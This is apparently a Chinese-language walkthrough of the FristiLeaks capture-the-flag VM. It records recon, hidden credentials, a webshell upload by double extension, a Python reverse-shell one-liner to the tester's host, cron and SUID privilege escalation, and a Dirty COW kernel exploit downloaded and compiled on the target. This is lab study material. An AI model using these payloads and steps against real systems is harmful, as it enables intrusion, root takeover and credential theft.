本文内容纯属虚构，B站攻略鸭求关注点赞支持！

测试机地址：192.168.31.196

根据靶机描述将MAC地址配置为08:00:27:A5:A6:76，开机后得到靶机地址：192.168.31.123

（配置虚拟机的MAC地址方法：虚拟机设置->网络适配器->高级->MAC地址）

外部信息收集

端口扫描

Nmap结果：

80/tcp open  Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
robots.txt：/cola /sisi /beer
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE

80端口

页面源代码没敏感内容

打开三个目录后页面源代码中只有地址/images/3037440.jpg

目录枚举

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.123/FUZZ

没内容

漏洞利用

隐写信息泄露

看别人博客发现/fristi/有个登录框

页面源代码的注释中发现用户名eezeepz和

<!--
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->

解析base64编码的图片得到字符串keKkeKKeKKeKkEkkEk

测试登录框：

http://192.168.31.123/fristi/checklogin.php

POST /fristi/checklogin.php HTTP/1.1

myusername=test1&mypassword=test2&Submit=Login

返回

Wrong Username or Password

未发现登录失败处理，尝试账号枚举失败

尝试eezeepz:keKkeKKeKKeKkEkkEk登录成功，发现有上传图片功能。

文件上传

提交正常图片white-wolf-wizard.jpg后，返回说文件提交到了/uploads

尝试访问http://192.168.31.123/fristi/uploads/，返回no

访问white-wolf-wizard.jpg

上传冰蝎马，提示只可以png,jpg,gif

已知服务器中间件版本，尝试上传http://192.168.31.123/fristi/uploads/shell.php.jpg成功

>id
uid=48(apache) gid=48(apache) groups=48(apache)

测试机端nc -nvlp 443，冰蝎命令执行

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.196",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
成功
python -c 'import pty;pty.spawn("/bin/bash")'
echo $-

权限提升

以apache用户收集信息

cat /etc/passwd
eezeepz:x:500:500::/home/eezeepz:/bin/bash
admin:x:501:501::/home/admin:/bin/bash
fristigod:x:502:502::/var/fristigod:/bin/bash
fristi:x:503:100::/var/www:/sbin/nologin

OS: Linux version 2.6.32-573.8.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org)
(gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Nov 10 18:01:38 UTC 2015
gcc.x86_64    4.4.7-16.el6

查看计划任务：

ls -al /etc/cron*

/etc/cron.d/0hourly:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
01 * * * * root run-parts /etc/cron.hourly


/etc/cron.hourly/0anacron:
cat /etc/cron.hourly/0anacron
#!/bin/bash
# Skip excecution unless the date has changed from the previous run
if test -r /var/spool/anacron/cron.daily; then
   day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
   exit 0;
fi

# Skip excecution unless AC powered
if test -x /usr/bin/on_ac_power; then
   /usr/bin/on_ac_power &> /dev/null
   if test $? -eq 1; then
   exit 0
   fi
fi
/usr/sbin/anacron -s

ls -al /usr/sbin/anacron
-rwxr-xr-x. 1 root root 38968 Nov 10  2015 /usr/sbin/anacron

/var/spool/anacron:
-rw-------. 1 root root    9 Dec  5 05:22 cron.daily
-rw-------. 1 root root    9 Dec  5 06:02 cron.monthly
-rw-------. 1 root root    9 Dec  5 05:42 cron.weekly
无内容


ls -al /var/spool/cron
-rw-------  1 admin    admin   49 Nov 18  2015 admin
无权限

Sudo version 1.8.6p3

SELinux status:disabled

mysql  Ver 14.14 Distrib 5.1.73

数据库：

cat /var/www/html/fristi/checklogin.php
$host="localhost"
$username="eezeepz"; // Mysql username
$password="4ll3maal12#"; // Mysql password
$db_name="hackmenow"; // Database name
$tbl_name="members"; // Table name

mysql -h localhost -u eezeepz -p 4ll3maal12
登录失败

查邮件

ls -al /var/mail/
ls -al /var/spool/mail/

无权限且大小都为0

cat /var/www/notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry


/home/eezeepz
ls -al
...
-r--r--r--. 1 eezeepz eezeepz    514 Nov 18  2015 notes.txt
...

cat notes.txt
Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

\- Jerry

注意到在/tmp/下创建runthis，会以admin用户运行

SUID提权

尝试

echo "chmod -R 777 /home/admin" >/tmp/runthis无法执行
echo "/bin/chmod -R 477 /home/admin" >/tmp/runthis无法执行
返回：command did not start with /home/admin or /usr/bin

echo "/usr/bin/../../bin/chmod -R 777 /home/admin" >/tmp/runthis可以执行
(/usr/bin/下面没有chmod)

找哪些属于admin的文件

find / -user admin 2>/dev/null
/home/admin
/home/admin/df
/home/admin/cat
/home/admin/chmod
/home/admin/cryptedpass.txt
/home/admin/.bash_logout
/home/admin/.bashrc
/home/admin/echo
/home/admin/egrep
/home/admin/ps
/home/admin/cryptpass.py
/home/admin/.bash_profile
/home/admin/grep
/home/admin/cronjob.py
/var/spool/mail/admin
/tmp/cronresult

cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

cryptpass.py
import base64,codecs,sys

def encodeString(str):
   base64string= base64.b64encode(str)
   return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

先base64编码，后反转字符串，再rot13编码。

改写为解密脚本decryptpass.py

import base64,codecs,sys

def decodeString(str):
   rot13string=codecs.encode(str[::-1], 'rot13')
   explicit= base64.b64decode(rot13string)
   return explicit

cryptedpass='mVGZ3O3omkJLmy2pcuTq'
whoisyourgodnow='=RFn0AKnlMHMPIzpyuTI0ITG'

print ("cryptedpass: ",str(decodeString(cryptedpass),encoding='utf-8'))
print ("whoisyourgodnow: ",str(decodeString(whoisyourgodnow),encoding='utf-8'))$ python decryptpass.py
cryptedpass:  thisisalsopw123
whoisyourgodnow:  LetThereBeFristi!

su fristigod
Password: LetThereBeFristi!

根据passwd文件中：fristigod:x:502:502::/var/fristigod:/bin/bash
cd /var/fristigod
ls -al
-rw-------   1 fristigod fristigod  864 Nov 25  2015 .bash_history
drwxrwxr-x.  2 fristigod fristigod 4096 Nov 25  2015 .secret_admin_stuff

cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

看出可以通过sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom执行root命令

cd .secret_admin_stuff
ls -al
**-rwsr-sr-x**  1 root      root      7529 Nov 25  2015 doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
[sudo] password for fristigod: LetThereBeFristi!
\# id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)

内核提权

测试机：

$ cp /usr/share/exploitdb/exploits/linux/local/40839.c .
$ python -m http.server 8080

靶机：

cd /tmp
wget 192.168.31.196:8080/40839.c
gcc -pthread 40839.c -o dirty -lcrypt
./dirty 123456qaz

结果：

firefart:fire86WDPZnrM:0:0:pwned:/root:/bin/bash
mmap: 7ff3e25bd000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123456qaz'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

$ su firefart
Password: 123456qaz

# id
uid=0(firefart) gid=0(root) groups=0(root)

其他

cat /var/spool/cron
* * * * * /usr/bin/python /home/admin/cronjob.py

cat /etc/sudoers
fristigod ALL=(fristi:ALL) /var/fristigod/.secret_admin_stuff/doCom

# cat /root/fristileaks_secrets.txt
cat /root/fristileaks_secrets.txt
Flag: Y0u_kn0w_y0u_l0ve_fr1st1

没猜到fristi目录，当时没法翻译这个单词，后来查了下是个饮料的名字

本文未经作者同意禁止转载！

文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！